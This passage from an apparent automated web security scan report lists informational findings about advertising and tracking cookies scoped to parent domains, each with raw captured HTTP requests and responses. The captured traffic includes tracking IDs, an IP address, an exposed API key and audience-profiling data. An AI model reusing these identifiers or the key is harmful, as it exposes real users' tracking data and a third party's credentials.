Zpycv7iAIdiRqCzT2O7l4iJ7M9KxLjk1g4iCGD9d7Bnf8DlenBahcgWfsEGGIhs5S1kFpi2waCP7M7IujJgpjReKx1oUaC2n3sTgsAsWXiCGSqi2H+bXTiMMwsbJmmqfh868zK8DT+UO34iIPSUNvH+9LxJlBTM4zrgbRvxKmEfkoloEey8Su2LcC/4TDoX454zYkzghKdrM3/VDDSg+++jIzOmyR5H8EBbymNhwm7Cmao7CkbCQGVGV16kzTOLqS3tkquW5FO+I14XiU9MC7s+YlpQqTQVNzikypsQ4mMakObHYNqGm5smzfVuiZokZDMLmaJJ+zMjo6DR8oVkzbJ2cg0JXUK2spmVjvN0lBQ3ScDOssaW3dWwhnHwKlK+F52CFLZNUle4dDJXioVnhLAxZjivb1FLCoqz8bXtM5SEKXAk6zrOOICONbcEtivU=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnXgmVDHz5HNAamBpCwgBedmjQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUPNOV2DdxIY1n3ioaH2BaM5+38g0fnq9IMs3Ssj976dqyMflzXndtQ/xCpjwkdl3jNjHIsSwidNVbPyQ8UukRlWAjzpgFu32Lh8TKovNuSMVT5zGqo+lVmsW02snStYmh6NVd6vQsWlMKLdx+mE2quPRxQw99QyHqQDKQmPTjX0IeU2BSj1d6aejeA2FSqM0oOtyZX/O2DScq9ciwmaexHpxuC3w/9hpURE0P7vbEXMP6qBRPf1ZS7Lkitm9khGEOewMOnllBWOlHOFGK43TM3FBJBRb/6qLcoC6gfW2xM4RivQvRRtikTJpufS1CInAw1no+zVmXZ2hTS6ONfIS1L7xA3elQ2eEN3P9aLspLwGIOLc4LwKaIjxEp7wbwhRcuvh+Onumpz1EcrdgPTf0xnSkxhfwzY2GYLXed45lhrR1joiovE7lKLUbTGz7+E1+YbvI8XZKmgeItShiLEr0yzF8A8nxh4PvIu9Cjo6s3qCFOY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:14 GMT
Content-Length: 1207

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...
5.23. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=360&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; srh="1%3Aq64FAA%3D%3D"; vsd=0@1@4d9fa6a8@s7.addthis.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B";Path=/;Domain=.adbrite.com;Expires=Sat, 16-Apr-2011 12:35:43 GMT
Set-Cookie: b="%3A%3Adqjd";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 06-Apr-2021 12:35:43 GMT
Set-Cookie: vsd=0@1@4da0529f@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:43 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 1583

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <script src='http://ad.turn.com/server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid
...[SNIP]...
5.24. http://adx.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESENjWPLIPAv41DU05MuE90XA&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302541875197&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChEIiXoQChgCIAIoAjC27IztBAoSCNyOARAKGAEgASgBMODnjO0EELbsjO0EGAI.; acb917920=5_[r^kI/7Z6[kCcE/qX3Ib3`j?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP5U0V0-cDA0L8f5MdWfsOng2NqNNAAAAAMY5AwA3AQAAfAAAABkAAAChsAMAoVsAAAEAAABVU0QAVVNEANgCWgCqAQAANQIBAgUCAAUAAAAAWyI5nAAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198712%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12488354959403911,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5780,%5C%22spendCreativeId%5C%22:198712,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd146.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12488354959403911%5EMEDIA6_DATA%5Efoo=bar; uuid2=8663496762294337265; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6W0Jrx!wQ.V#j3ObY5m*u3dTEH)U-!CnH%ij_4iN6VW%p2Y9bgzjq.G_8=%p/i)(Jz8WMaNXPrmLD4N(wOREnYe2x7$c4'2neswzJN:s*lyNP)1B_c=(g0OA*e6^R@`G^X$#oW*!b^J$.Nc5F$w'Wj8jw0_-7u-oqgU)d@IY4T6Pqj1!Y(b<VCl-wnmeMRAPasr@q5MvlBYdla=XKh8tlB`)M^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6W0Jrx!wQ.V#j3ObY5m*u3dTEH)U-!CnH%ij_4iN6VW%p2Y9bgzjq.G_8=%p/i)(Jz8WMaNXPrmLD4N(wOREnYe2x7$c4'2neswzJN:s*lyNP)1B_c=(g0OA*e6^R@`G^X$#oW*!b^J$.Nc5F$w'Wj8jw0_-7u-oqgU)d@IY4T6Pqj1!Y(b<VCl-wnmeMRAPasr@q5MvlBYdla=XKh8tlB`)M^; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 11 Apr 2011 17:11:22 GMT

GIF89a.............!.......,........@..L..;
5.25. http://ak1.abmr.net/is/content.yieldmanager.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/content.yieldmanager.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/content.yieldmanager.com?U=/ak/q.gif&V=3-lx%2fQOmxQNG0eorn%2fu8LBhvJeo45BnPB%2fik23iGVe80aLZrxSviggiGQ1thVyWCGj7JoWTuGQqRQ%3d&I=EEEA60E55DC1402&D=content.yieldmanager.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540674267&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
Cache-Control: max-age=0
If-Modified-Since: Wed, 18 Oct 2006 18:25:22 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-D732F82572E67A35BA5BF05696140341DF83DF41237D012794F25B5156411B0E-3991BE1D4764374636ED9D1B940FEA8D6229E8AE7445C18E6AE4FBD599FB6EE4

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://content.yieldmanager.com/ak/q.gif?01AD=2-2-7320F771B78BB912BBA6B43FD09A375AF470E07BBA7F6263FC7DF97235E71B2C-50EA0A74EF7A786FBF142F634336342D871099348D54D03CEE7EFC7E33D7483D&01RI=EEEA60E55DC1402&01NA=
Expires: Mon, 11 Apr 2011 16:51:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:51:19 GMT
Connection: close
Set-Cookie: 01AI=2-2-F7FF007DF9666A4675E172271ED2877EA801245906FC6F74799C0E1365DEE428-3B5BB0512DF04136FE1D7AF68802888AFF3B2F2871905733FA86994B3CC4A79D; expires=Tue, 10-Apr-2012 16:51:19 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

5.26. http://ak1.abmr.net/is/tag.admeld.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/tag.admeld.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.admeld.com?U=/ad/iframe/3/foxnews/300x250/politics-bottom&V=3-jUOVCZARsyxH+dHMws+VqMAEIhqWEkm6k05w0XlzIC91Jfeb+K8e+Q%3d%3d&I=90A4C54ACA8290D&D=admeld.com&01AD=1&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-EA49BC622C57E43014F7FE6EF1355413FADB8358BB4C363A4AF6797B5374FC5E-F664F3AE4E6B6C96B2174BDC101997813BE6B909145967C31BB3ED42B9E6829B

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3xkFoRwzZdHZJY48tpCxWZPLpmZ45zClagwxC5r36lze5klo7zuqbUg&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
Expires: Mon, 11 Apr 2011 16:21:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:21:18 GMT
Connection: close
Set-Cookie: 01AI=2-2-D766EC567D77B70A389C7D071A0C270EA4C213784ABFB628475CCF489CEFE47B-252217F50ECC03FC6DFE8656A68CB869AB99A49B02FC80DFDCD099F29516FE2A; expires=Tue, 10-Apr-2012 16:21:18 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

5.27. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 4:27:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 525
Date: Mon, 11 Apr 2011 16:21:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.1
...[SNIP]...
5.28. http://api.bizographics.com/v1/profile.redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=15; BizoID=b67e419b-0f67-49a8-9374-7947627c8dff; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDzCvipnduuyh7dsnRGwuisv9lgdLN2CDPvYnN3SaI2ZY7d4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57XvbckI43H8V9NXzJIXKwEOngHh2VamB2EXVXtg7b5stvcAWXzmjMHHvxUvUolOIqHLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 11 Apr 2011 16:21:26 GMT
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=4&seniority=executive&industry=business_services&functional_area=information_technology&location=texas&group=high_net_worth
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=b67e419b-0f67-49a8-9374-7947627c8dff;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDvMYL6FMax0vdsnRGwuisv9jRbgsAzbwmlWisxtfL18I2N4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57UeTh1BhcR7a9NXzJIXKwEOngHh2VamB2DMjR7kplxipHvcAWXzmjMHEnpfCFNipPpMXLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive

5.29. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036361&rn=1225152024&c7=http%3A%2F%2Fwww.wcax.com%2F&c4=%2FGlobal%2Fcategory.asp%3FC%3D18195&c8=WCAX.COM%20Local%20Vermont%20News%2C%20Weather%20and%20Sports-%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 09 Apr 2011 12:29:30 GMT
Connection: close
Set-Cookie: UID=167523a-24.143.206.177-1301787521; expires=Mon, 08-Apr-2013 12:29:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

5.30. http://bcp.crwdcntrl.net/4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
